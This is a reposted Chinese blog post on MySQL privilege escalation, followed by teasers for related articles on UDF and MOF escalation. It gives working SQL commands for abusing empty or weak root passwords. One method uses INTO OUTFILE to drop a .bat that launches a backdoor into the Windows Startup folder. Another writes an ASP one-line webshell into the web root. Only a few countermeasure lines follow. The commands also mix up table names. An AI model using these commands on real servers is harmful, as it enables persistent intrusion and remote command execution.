MYSQL提权技巧

转载 2011年01月21日 13:40:00

转老邪

问题对象:有虚拟主机空间商.网站服务器  
过程:建立一个表→在表中输入我们的提权内容→出表→完成  
1.mysql默认开启3306端口.如果服务器默认密码不设置就是空密码.黑客们就可能利用该弱口令漏洞.来攻击我们的服务器.  
2.如果在得到用户名为:root 密码为:(空密码时候),黑客就可以攻击进我们网站的.答案他们利用导出一句话木马.  
3.黑客可以得到一个webshell然后.查看网站配置信息.就可以找到这个账号和密码.例如inc.php coon.asp等这些文件  
4.虚拟主机提供商,自己给我们的mysql账号和密码.  
一  
创建新表,开机自启动,来得到cmd,其命令如下:  
1:创建一个新的表  
create table hx小龙 (cmd text);  
含义:创建了一个新的表,表名为bycnboytest,表中只存放一个字段,字段名为cmd,为text文本]

二是:运行我们的后门木马之类的东西.大家自己灵活.

insert into hx小龙 values ("(路径)c:/cmd11.exe " );

三:输出表为一个bat的脚本文件  
select * from bycnboytest into outfile "c://docume~1//alluse~1//「开始」菜单//程序//启动//54td.bat";  
导出一个文件文:54td.bat(c://docume~1//alluse~1//「开始」菜单//程序//启动/此路径才为开机自启动)  
二  
导出一句木马类:  
执行:show databases; 看服务器中有些什么数据库  
use test;进入数据库  
show tables;查看我们进入数据库中有些什么数据表


create table hx小龙123 (cmd text); 创建一个新的表  
insert into hx小龙123 values ("<%execute request("textarea1")%> " );在表中插入一句话木马内容


select * from hx小龙123 into outfile "(导出到网站物理路径如):D:/www/web/54td.asp";

应对措施:  
将上方的启动目录,设置为不可写  
安装关机还原等软件  
网站重要文件进行加密等。

Mysql提权

Mysql提权来源:本站转载 作者:佚名 时间:2012-07-19 TAG: 我要投稿Author:小乖&Mix0xrnFrom:http://www.dis9.com & http://team....
  • forest_fire
  • forest_fire
  • 2016年03月21日 11:04
  • 1478

Linux mysql root 提权

http://www.8090sec.com/Linuxgongfang/111396.html * Usage:  * $ id  * uid=500(raptor) gid=500(...
  • kendyhj9999
  • kendyhj9999
  • 2014年09月22日 16:47
  • 2025

Mysql本地提权漏洞/写my.cnf文件命令执行漏洞

0x00 漏洞影响 MySQL   5.6.33 5.5.52 Mysql分支的版本也受影响,包括: MariaDB PerconaDB  0x01 条件 (1)可以在低权(需要有FILE权限...
  • u011721501
  • u011721501
  • 2016年09月13日 01:37
  • 5070

MySQL数据库Root权限MOF方法提权研究

MySQL Root权限MOF方法提权是来自国外Kingcope大牛发布的MySQL Scanner & MySQL Server for Windows Remote SYSTEM Level Ex...
  • github_34457546
  • github_34457546
  • 2016年11月02日 17:23
  • 2002

windows server 下 mysql数据库提权调用系统命令

主要是配置mySql数据库使mySQL数据库可以调用dos命令,例如cmd ,ipconfig等等,案例:数据库触发器调用系统相关的命令; 首先需要下载lib_mysqludf_sys-master...
  • jav_imba
  • jav_imba
  • 2014年12月28日 20:18
  • 1235

MySQL扩展接口UDF提权

一、MySQL自定义函数UDF提权 1.UDF介绍 udf(user-defined function)是MySQL的一个拓展接口,也称为自定义函数。 2. UDF提权条件 1)目标系统是Window...
  • Liuhuaijin
  • Liuhuaijin
  • 2017年08月18日 17:00
  • 329

Mysql udf提权(Linux平台)

http://vinc.top/2017/04/19/mysql-udf%E6%8F%90%E6%9D%83linux%E5%B9%B3%E5%8F%B0/ UDF是MySQL的一个共享...
  • qq_33020901
  • qq_33020901
  • 2017年12月17日 20:03
  • 444

Mysql_UDF提权

Root权限一、上传udf.dll小于mysql5.1版本 C:\WINDOWS\udf.dll 或 C:\WINDOWS\system32\udf.dll 等于mysql5.1版本 ...
  • WuLex
  • WuLex
  • 2017年02月04日 23:27
  • 5449

(新安全原创精华)Mysql扩展文件MOF提权详讲

哈喽,大家好,我是0x_ALis,我代表新安全网络攻防研究室又来咱们的I春秋发精华帖子了。 希望大家可以支持我们,我们也会做得更好。无论是批评还是鼓励我们一样接受。 【MYSQL提权】My...
  • zminr411421_
  • zminr411421_
  • 2016年08月12日 17:37
  • 2810

提权系列(一)----Windows Service 服务器提权初识与exp提权,mysql提权

一、 二、Windwos常见提权
  • u011781521
  • u011781521
  • 2017年03月29日 17:23
  • 4328
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:MYSQL提权技巧
举报原因:
原因补充:

(最多只允许输入30个字)